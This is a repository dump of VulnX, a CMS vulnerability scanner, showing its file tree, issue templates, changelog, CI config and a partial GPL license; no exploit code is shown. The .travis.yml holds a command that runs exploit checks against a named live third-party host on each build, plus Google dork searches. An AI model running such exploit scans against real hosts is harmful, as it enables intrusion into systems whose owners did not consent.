├── .github └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── .gitignore ├── .travis.yml ├── CHANGELOG.md ├── CONTRIBUTING.md ├── LICENSE ├── README.md ├── cli.py ├── common ├── __init__.py ├── banner.py ├── colors.py ├── output_wr.py ├── requestUp.py ├── threading.py └── uriParser.py ├── config ├── vulnx.desktop └── vulnxicon.png ├── docker ├── Dockerfile ├── README └── debian_stretch │ └── Dockerfile ├── install.sh ├── modules ├── __init__.py ├── dnsLookup.py ├── dorksEngine.py ├── druExploits.py ├── jooExploits.py ├── jooGrabber.py ├── portChecker.py ├── prestaExploits.py ├── wpExploits.py └── wpGrabber.py ├── requirements.txt ├── shell ├── VulnX.gif ├── VulnX.html ├── VulnX.php ├── VulnX.php.mp4 ├── VulnX.php.png ├── VulnX.txt └── VulnX.zip ├── update.sh └── vulnx.py /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Run `python vulnx.py ...` with options '...' 16 | 2. Against a target of type '...' (CMS, hosting setup — do not post the real target hostname) 17 | 3. Observe '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots or pasted output to help explain your problem. Issues are public: redact target hostnames, IP addresses and anything retrieved from third-party systems before posting. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. Ubuntu 18.04, Windows 10, macOS] 28 | - Python version [e.g. 3.6] 29 | - vulnx version [e.g. 1.9] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. Android phone] 33 | - OS: [e.g. Android 9] 34 | - Environment [e.g. Termux] 35 | - vulnx version [e.g. 1.9] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 
39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | os: 3 | # os building 4 | - linux 5 | python: 6 | # version of python. 7 | - 3.6 8 | install: 9 | # install packages. 10 | - pip install -r ./requirements.txt 11 | before_script: 12 | - pip install flake8 13 | # stop the build if there are Python syntax errors or undefined names 14 | - flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics 15 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide 16 | - flake8 . 
--count --exit-zero --max-complexity=10 --max-line-length=127 --statistics 17 | script: 18 | # run the full grabber against the target and apply the vulnerability search. NOTE: this runs real scan and exploit checks (--exploit) against a live third-party host from CI on every build; keep a real hostname here only with the host owner's written authorization, otherwise point it at a lab host you control. 19 | - python vulnx.py -u isetso.rnu.tn --cms all -t3 --web-info --exploit 20 | # show the dork list, search 5 pages of Google results for the `blaze` dork, and write the results to logs/Dorks/getTime() 21 | - python vulnx.py -l all -D blaze -n 5 --output logs/ 22 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | #### v1.9 2 | - Add Vulnx-Mode `interactive mode` 3 | - Add Command Line Interface class `cli` 4 | - Add Dork functionality to Vulnx-Mode 5 | - Fix DNSDUMP functionality 6 | 7 | #### v1.8 8 | - Remove pip & rename conf to config so that update runs without problems. 9 | - Fix port arg to give port to scan. 10 | - CI : Change pip package. 11 | - Docker : change pip package. 12 | - Remove the ENV Variable. 13 | 14 | #### v1.7 15 | - add documentation for vulnx on Windows. 16 | - add minor changes in dockerfile. 17 | - add documentation for developers using vulnx as a library 18 | - fix regEx in prestashop version. 19 | - error handling and ignoring of warnings. 20 | 21 | #### v1.6 22 | - Added Payloads. 23 | - Added PS Exploits 24 | - Added Joomla Exploits 25 | - Fix Issues 26 | - Added Dorks Output {logs} 27 | - Scan Multiple targets. 28 | - Docker: run as a dedicated user. {`Fix Permissions`} 29 | - Fix .travis {`CI`: Run tests after merge or pull requests} 30 | - Listing Dorks {list `ps` , `joo` , `wp` , `dru`} exploits manually 31 | 32 | #### v1.5 33 | - Added 8 Prestashop Exploits. 34 | - Added `Windows` & `MacOS` Compatibility 35 | - Fixed a few bugs 36 | - Added vulnx to Docker from Ubuntu Image. 37 | 38 | #### v1.4 39 | - Fix parsing url 40 | - Fix Google's "robot detected" block when searching for dorks. 
41 | - Deserialize `json` data from dnsdumpster 42 | - Added `Bot` automated scan 43 | - Fix module names 44 | - Export `Dorks` search results into a file 45 | 46 | #### v1.3 47 | - Added vulnx to `PyPi` 48 | - Added a `ports` scanner **plugin**. 49 | - Improve `dorks` Google searching. 50 | - Added `termux` compatibility & fix pip package. 51 | 52 | #### v1.2 53 | - Use of `ThreadPoolExecutor` for more speed 54 | - Added pip packages. 55 | - Added `travis.yml` continuous integration 56 | - Added shields to README.MD 57 | 58 | #### v1.1 59 | - Added `--timeout` , `--exploits` , `--cms-info` , `--domains-info` , options 60 | - Added `Dorks` list 61 | - Fixed `Dork Search` 62 | - Added `wordpress`, `joomla` ,`prestashop`, `drupal` , `lokomedia` , `magento` , `opencart` CMS detection. 63 | - Disabled `SSL` warning (note: this silences the warning rather than fixing its cause; if it is paired with disabled certificate verification, the scanner's HTTPS traffic can be intercepted — confirm in `common/requestUp.py`) 64 | - Added `WP-Exploits` 65 | - Fixed `Dockerfile` 66 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. 
We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 
49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. 
The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 
122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 
155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 
186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. 
This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 
256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 
287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 
317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. 
If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 
386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 
421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. 
If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 
486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 
512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. 
If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 
